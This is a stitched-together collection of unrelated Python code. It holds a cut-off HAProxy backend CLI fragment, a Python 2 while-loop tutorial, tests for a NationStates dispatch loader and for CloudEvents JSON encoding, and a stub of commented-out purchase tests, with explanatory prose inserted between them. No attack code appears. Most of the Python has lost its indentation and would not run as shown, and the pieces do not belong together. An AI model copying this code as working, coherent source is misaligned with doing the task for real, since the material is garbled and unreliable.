'', 'conn_cnt', 'conn_cur', 'conn_rate', 'sess_cnt', 'sess_rate', 'http_req_cnt', 'http_req_rate',
'http_err_cnt', 'http_err_rate', 'bytes_in_cnt', 'bytes_in_rate', 'bytes_out_cnt', 'bytes_out_rate'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--stickiness_expire',
help=(
'This configures the maximum duration of an entry in the stick-table since it was last created, refreshed '
'or matched. The maximum duration is slightly above 24 days. Enter a number followed by one of the supported '
'suffixes "d" (days), "h" (hours), "m" (minutes), "s" (seconds), "ms" (milliseconds).'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_size',
help=(
'This configures the maximum number of entries that can fit in the table. '
'This value directly impacts memory usage. '
'Count approximately 50 bytes per entry, plus the size of a string if any. '
'Enter a number followed by one of the supported suffixes "k", "m", "g".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_cookiename',
help='Cookie name to use for stick table.',
show_default=True,
default=None
)
@click.option(
'--stickiness_cookielength',
help='The maximum number of characters that will be stored in the stick table.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--stickiness_connRatePeriod',
help=(
'The length of the period over which the average is measured. It reports the average incoming connection rate '
'over that period, in connections per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_sessRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming session rate over that period, '
'in sessions per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_httpReqRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_httpErrRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request error rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_bytesInRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming bytes rate over that period, in bytes per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_bytesOutRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average outgoing bytes rate over that period, in bytes per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--basicAuthEnabled/--no-basicAuthEnabled',
help='Enable HTTP basic authentication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--basicAuthUsers',
help='Basic auth users.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--basicAuthGroups',
help='Basic auth groups.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutConnect',
help=(
'Set the maximum time to wait for a connection attempt to a server to succeed. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutCheck',
help=(
'Sets an additional read timeout for running health checks on a server. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutServer',
help=(
'Set the maximum inactivity time on the server side. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_retries',
help=(
'Set the number of retries to perform on a server after a connection failure.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--customOptions',
help=(
'These lines will be added to the HAProxy backend configuration.'
),
show_default=True,
default=None
)
@click.option(
'--tuning_defaultserver',
help=(
'Default option for all server entries.'
),
show_default=True,
default=None
)
@click.option(
'--tuning_noport/--no-tuning_noport',
help=(
"Don't use port on server, use the same port as frontend receive. "
"If check enable, require port check in server."
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--tuning_httpreuse',
help=(
'Declare how idle HTTP connections may be shared between requests.'
),
type=click.Choice(['', 'never', 'safe', 'aggressive', 'always']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--tuning_caching/--no-tuning_caching',
help=(
'Enable caching of responses from this backend. '
'The HAProxy cache must be enabled under Settings before this will have any effect.'
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--linkedActions',
help='Choose rules to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--linkedErrorfiles',
help='Choose error messages to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--output', '-o',
help='Specifies the output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help="Which columns should be printed? Pass an empty string (-c '') to show all columns.",
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def update(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Update a backend.
"""
json_payload = {
'backend': {}
}
options = [
'enabled', 'name', 'description', 'mode', 'algorithm', 'random_draws', 'proxyProtocol', 'linkedServers',
'linkedResolver', 'resolverOpts', 'resolvePrefer', 'source', 'healthCheckEnabled', 'healthCheck',
'healthCheckLogStatus', 'checkInterval', 'checkDownInterval', 'healthCheckFall', 'healthCheckRise',
'linkedMailer', 'http2Enabled', 'http2Enabled_nontls', 'ba_advertised_protocols', 'persistence',
'persistence_cookiemode', 'persistence_cookiename', 'persistence_stripquotes', 'stickiness_pattern',
'stickiness_dataTypes', 'stickiness_expire', 'stickiness_size', 'stickiness_cookiename',
'stickiness_cookielength', 'stickiness_connRatePeriod', 'stickiness_sessRatePeriod',
'stickiness_httpReqRatePeriod', 'stickiness_httpErrRatePeriod', 'stickiness_bytesInRatePeriod',
'stickiness_bytesOutRatePeriod', 'basicAuthEnabled', 'basicAuthUsers', 'basicAuthGroups',
'tuning_timeoutConnect', 'tuning_timeoutCheck', 'tuning_timeoutServer', 'tuning_retries', 'customOptions',
'tuning_defaultserver', 'tuning_noport', 'tuning_httpreuse', 'tuning_caching',
'linkedActions', 'linkedErrorfiles'
]
for option in options:
if kwargs[option.lower()] is not None:
json_payload['backend'][option] = kwargs[option.lower()]
result = haproxy_backend_svc.update_backend(kwargs['uuid'], json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help="Which columns should be printed? Pass an empty string (-c '') to show all columns.",
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def delete(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Delete a backend.
"""
result = haproxy_backend_svc.delete_backend(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
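The `update` command above sends only the options the caller actually set: every option Click leaves as `None` is filtered out before the payload reaches the API. A standalone sketch of that filtering pattern (the `build_payload` helper is illustrative, not part of the CLI):

```python
def build_payload(options, kwargs):
    """Keep only options the user actually passed (Click leaves unset ones as None)."""
    payload = {'backend': {}}
    for option in options:
        value = kwargs.get(option.lower())
        if value is not None:
            payload['backend'][option] = value
    return payload

cli_kwargs = {'enabled': '1', 'name': None, 'tuning_retries': '3'}
payload = build_payload(['enabled', 'name', 'tuning_retries'], cli_kwargs)
print(payload)  # {'backend': {'enabled': '1', 'tuning_retries': '3'}}
```

Because unset options never reach the payload, a partial update only touches the fields the user named on the command line.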
#!/usr/bin/env python
# Source: python/basis/4-while.py (weizhenwei/tech-docs-2016, BSD-2-Clause)
count = 0
# Basic while loop: prints the numbers 0 through 8.
while (count < 9):
    print "The count is ", count
    count = count + 1

count = 0
# continue: skip even counts, so only odd counts are printed.
while (count < 9):
    if (count % 2 == 0):
        count = count + 1
        continue
    print "The count is ", count
    count = count + 1

count = 0
# break: stop the loop early once count reaches 7.
while (count < 9):
    if (count == 7):
        break
    print "The count is ", count
    count = count + 1

count = 0
# while/else: the else block runs once the loop condition becomes false
# (it is skipped if the loop is left via break).
while (count < 9):
    print "The count is ", count
    count = count + 1
else:
    print "The count is more than 9"

print "Good bye!"

# Source: tests/test_file_dispatchloader.py (watarinishin/ns-dispatch-utility, MIT)
import os
import json
import toml
import shutil
from unittest import mock
import pytest
from nsdu import exceptions
from nsdu.loaders import file_dispatchloader
class TestDispatchConfigManager():
def test_load_from_file_with_multiple_files(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '67890',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'},
'test3': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test5': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test6': {'ns_id': '54321',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
file_1_path_str = str(dispatch_config_dir / 'dispatch_config_1.toml')
file_2_path_str = str(dispatch_config_dir / 'dispatch_config_2.toml')
ins.load_from_files([file_1_path_str, file_2_path_str])
assert ins.all_dispatch_config == {file_1_path_str: dispatch_config_1,
file_2_path_str: dispatch_config_2}
def test_load_from_file_with_an_non_existent_file(self, toml_files):
dispatch_config = {'nation1': {'test1': {'title':
'Test title 1',
'category': '1',
'subcategory': '100'}}}
file_path = toml_files({'dispatch_config.toml': dispatch_config})
ins = file_dispatchloader.DispatchConfigManager()
with pytest.raises(FileNotFoundError):
ins.load_from_files([str(file_path), 'abcd.toml'])
def test_get_canonical_dispatch_config(self):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'action': 'voodoo',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test3': {'ns_id': '98765',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'action': 'remove',
'ns_id': '54321',
'title': 'Test title 5',
'category': '1',
'subcategory': '100'},
'test6': {'title': 'Test title 6',
'category': '1',
'subcategory': '100'},
'test7': {'action': 'remove',
'ns_id': '76543',
'title': 'Test title 7',
'category': '1',
'subcategory': '100'}}}
ins = file_dispatchloader.DispatchConfigManager()
ins.all_dispatch_config = {'config1.toml': dispatch_config_1,
'config2.toml': dispatch_config_2}
r = ins.get_canonical_dispatch_config()
expected = {'nation1': {'test1': {'action': 'edit',
'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'action': 'skip',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'},
'test3': {'action': 'edit',
'ns_id': '98765',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'action': 'create',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'},
'test5': {'action': 'remove',
'ns_id': '54321',
'title': 'Test title 5',
'category': '1',
'subcategory': '100'},
'test6': {'action': 'create',
'title': 'Test title 6',
'category': '1',
'subcategory': '100'},
'test7': {'action': 'remove',
'ns_id': '76543',
'title': 'Test title 7',
'category': '1',
'subcategory': '100'}}}
assert r == expected
def test_save_after_add_new_dispatch_id_for_all_new_dispatches(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
dispatch_config_file_1_path = dispatch_config_dir / 'dispatch_config_1.toml'
dispatch_config_file_2_path = dispatch_config_dir / 'dispatch_config_2.toml'
ins.load_from_files([str(dispatch_config_file_1_path), str(dispatch_config_file_2_path)])
ins.add_new_dispatch_id('test2', '23456')
ins.add_new_dispatch_id('test5', '54321')
ins.save()
expected_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '23456',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
expected_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'ns_id': '54321',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
assert toml.load(dispatch_config_file_1_path) == expected_1
assert toml.load(dispatch_config_file_2_path) == expected_2
def test_save_after_add_new_dispatch_id_for_only_one_new_dispatch(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
dispatch_config_file_1_path = dispatch_config_dir / 'dispatch_config_1.toml'
dispatch_config_file_2_path = dispatch_config_dir / 'dispatch_config_2.toml'
ins.load_from_files([str(dispatch_config_file_1_path), str(dispatch_config_file_2_path)])
ins.add_new_dispatch_id('test2', '23456')
ins.save()
expected_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '23456',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
expected_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
assert toml.load(dispatch_config_file_1_path) == expected_1
assert toml.load(dispatch_config_file_2_path) == expected_2
class TestFileDispatchLoaderObj():
def test_get_dispatch_template(self, text_files):
template_path = text_files({'test1.txt': 'Test text 1', 'test2.txt': 'Test text 2'})
obj = file_dispatchloader.FileDispatchLoader(mock.Mock(), template_path, '.txt')
assert obj.get_dispatch_template('test1') == 'Test text 1'
def test_get_dispatch_template_with_non_existing_file(self, tmp_path):
obj = file_dispatchloader.FileDispatchLoader(mock.Mock(), tmp_path, '.txt')
assert obj.get_dispatch_template('test2') is None
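The `text_files` and `toml_files` fixtures used throughout these tests come from `tests_helpers` and are not shown in this chunk. A plausible stdlib-only sketch of what `text_files` is assumed to do: write a dict of filename-to-content pairs into a temporary directory and return that directory's path:

```python
import tempfile
from pathlib import Path

def make_text_files(files):
    """Write each (name, content) pair into a fresh temp dir; return the dir path."""
    tmp_dir = Path(tempfile.mkdtemp())
    for name, content in files.items():
        (tmp_dir / name).write_text(content)
    return tmp_dir

template_path = make_text_files({'test1.txt': 'Test text 1', 'test2.txt': 'Test text 2'})
print((template_path / 'test1.txt').read_text())  # Test text 1
```

The real fixtures presumably wrap pytest's `tmp_path` so cleanup is automatic; this sketch only mirrors the interface the tests rely on.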
class TestFileDispatchLoaderIntegration():
@pytest.fixture
def dispatch_files(self, text_files):
return text_files({'test1.txt': 'Test text 1', 'test2.txt': 'Test text 2',
'test3.txt': 'Test text 3', 'test4.txt': 'Test text 4'})
def test_with_no_dispatch_creation_or_removal(self, dispatch_files, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '67890',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '78654',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
loader_config = {'dispatch_config_paths': [str(dispatch_config_dir / 'dispatch_config_1.toml'),
str(dispatch_config_dir / 'dispatch_config_2.toml')],
'dispatch_template_path': str(dispatch_files)}
loader = file_dispatchloader.init_dispatch_loader({'file_dispatchloader': loader_config})
r_dispatch_config = file_dispatchloader.get_dispatch_config(loader)
r_dispatch_text = file_dispatchloader.get_dispatch_template(loader, 'test1')
file_dispatchloader.cleanup_dispatch_loader(loader)
assert r_dispatch_config['nation1']['test4']['ns_id'] == '98765'
assert r_dispatch_text == 'Test text 1'
def test_with_one_dispatch_creation_and_one_removal(self, dispatch_files, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '78654',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'action': 'remove',
'ns_id': '98765',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
loader_config = {'dispatch_config_paths': [str(dispatch_config_dir / 'dispatch_config_1.toml'),
str(dispatch_config_dir / 'dispatch_config_2.toml')],
'dispatch_template_path': str(dispatch_files)}
loader = file_dispatchloader.init_dispatch_loader({'file_dispatchloader': loader_config})
r_dispatch_config = file_dispatchloader.get_dispatch_config(loader)
r_dispatch_text = file_dispatchloader.get_dispatch_template(loader, 'test1')
file_dispatchloader.add_dispatch_id(loader, 'test2', '54321')
file_dispatchloader.cleanup_dispatch_loader(loader)
assert r_dispatch_config['nation1']['test4']['action'] == 'remove'
assert r_dispatch_text == 'Test text 1'
assert toml.load(dispatch_config_dir / 'dispatch_config_1.toml')['nation1']['test2']['ns_id'] == '54321'
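These tests pivot on how `get_canonical_dispatch_config` assigns an `action` to each dispatch entry. A sketch of the resolution rule implied by the expected values (my own reconstruction, not the loader's actual code):

```python
KNOWN_ACTIONS = {'create', 'edit', 'remove'}

def resolve_action(entry):
    """Explicit known actions win; unknown actions become 'skip'; otherwise
    an entry with an ns_id is edited and one without is created."""
    action = entry.get('action')
    if action is not None:
        return action if action in KNOWN_ACTIONS else 'skip'
    return 'edit' if 'ns_id' in entry else 'create'

print(resolve_action({'ns_id': '12345'}))                  # edit
print(resolve_action({'title': 'Test title 4'}))           # create
print(resolve_action({'action': 'voodoo'}))                # skip
print(resolve_action({'action': 'remove', 'ns_id': '1'}))  # remove
```

This matches the expectations above: `test2` with `action = "voodoo"` resolves to `skip`, entries carrying an `ns_id` resolve to `edit`, and new entries resolve to `create`.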

# Source: tests/json_test.py (scaleplandev/spce-python, Apache-2.0)
# Copyright 2020 Scale Plan Yazılım A.Ş.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
from spce import CloudEvent, Json
class JsonEncoderTests(unittest.TestCase):
def test_encode_required(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
)
encoded = Json.encode(event)
target = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_optional(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
subject="subject1",
dataschema="https://particlemetrics.com/schema",
time="2020-09-28T21:33:21Z"
)
encoded = Json.encode(event)
target = '''
{"dataschema": "https://particlemetrics.com/schema",
"id": "1000",
"source": "oximeter/123",
"specversion": "1.0",
"subject": "subject1",
"time": "2020-09-28T21:33:21Z",
"type": "OximeterMeasured"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_string_data(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=json.dumps({"spo2": 99}),
datacontenttype="application/json"
)
encoded = Json.encode(event)
target = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_binary_data(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=b'\x01\x02\x03\x04',
datacontenttype="application/octet-stream"
)
encoded = Json.encode(event)
target = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/octet-stream",
"data_base64": "AQIDBA=="
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_extension_attribute(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
external1="foo/bar"
)
encoded = Json.encode(event)
target = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"external1": "foo/bar"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_batch_0_items(self):
self.assertEqual("[]", Json.encode([]))
def test_encode_batch_1_item(self):
event_batch = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
)
]
encoded_batch = Json.encode(event_batch)
target = r'''
[{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}]
'''
self.assertEqual(json.loads(target), json.loads(encoded_batch))
def test_encode_batch_2_items(self):
event_batch = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
),
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1001",
datacontenttype="application/json",
data=b'\x01binarydata\x02',
),
]
encoded_batch = Json.encode(event_batch)
target = r'''
[
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
},
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1001",
"specversion":"1.0",
"datacontenttype": "application/json",
"data_base64": "AWJpbmFyeWRhdGEC"
}
]
'''
self.assertEqual(json.loads(target), json.loads(encoded_batch))
class JsonDecoderTests(unittest.TestCase):
def test_decode_required(self):
encoded_event = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_optional(self):
encoded_event = '''
{"dataschema": "https://particlemetrics.com/schema",
"id": "1000",
"source": "oximeter/123",
"specversion": "1.0",
"subject": "subject1",
"time": "2020-09-28T21:33:21Z",
"type": "OximeterMeasured"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
subject="subject1",
dataschema="https://particlemetrics.com/schema",
time="2020-09-28T21:33:21Z"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_string_data(self):
encoded_event = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=json.dumps({"spo2": 99}),
datacontenttype="application/json"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_binary_data(self):
encoded_event = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/octet-stream",
"data_base64": "AQIDBA=="
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=b'\x01\x02\x03\x04',
datacontenttype="application/octet-stream"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_extension_attribute(self):
encoded_event = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"external1": "foo/bar"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
external1="foo/bar"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_batch_0_items(self):
self.assertEqual([], Json.decode("[]"))
def test_decode_batch_1_item(self):
encoded_batch = r'''
[{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}]
'''
target = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
)
]
self.assertEqual(target, Json.decode(encoded_batch))
def test_decode_batch_2_items(self):
encoded_batch = r'''
[
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
},
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1001",
"specversion":"1.0",
"datacontenttype": "application/json",
"data_base64": "AWJpbmFyeWRhdGEC"
}
]
'''
target = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
),
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1001",
datacontenttype="application/json",
data=b'\x01binarydata\x02',
),
]
self.assertEqual(target, Json.decode(encoded_batch))
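The encode/decode pairs above follow the CloudEvents JSON format rule for payloads: text data travels in the `data` member, while binary data is base64-encoded into `data_base64`. A minimal stdlib sketch of that mapping (`encode_data` is illustrative, not the spce API):

```python
import base64
import json

def encode_data(data):
    """Map a CloudEvent payload to its JSON member per the data/data_base64 rule."""
    if isinstance(data, bytes):
        return {'data_base64': base64.b64encode(data).decode('ascii')}
    return {'data': data}

print(encode_data(b'\x01\x02\x03\x04'))       # {'data_base64': 'AQIDBA=='}
print(encode_data(json.dumps({'spo2': 99})))  # {'data': '{"spo2": 99}'}
```

Note the `"AQIDBA=="` value matches the fixture in `test_encode_binary_data` above, which is exactly the base64 encoding of the four bytes `\x01\x02\x03\x04`.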

# Source: website/drawquest/apps/iap/tests.py (bopopescu/drawquest-web, BSD-3-Clause)
import base64
from drawquest.tests.tests_helpers import (CanvasTestCase, create_content, create_user, create_group,
create_comment, create_staff, create_quest, create_quest_comment)
from drawquest import economy
from services import Services, override_service
#class TestIap(CanvasTestCase):
# def test_purchasing_coins(self):
# user = create_user()
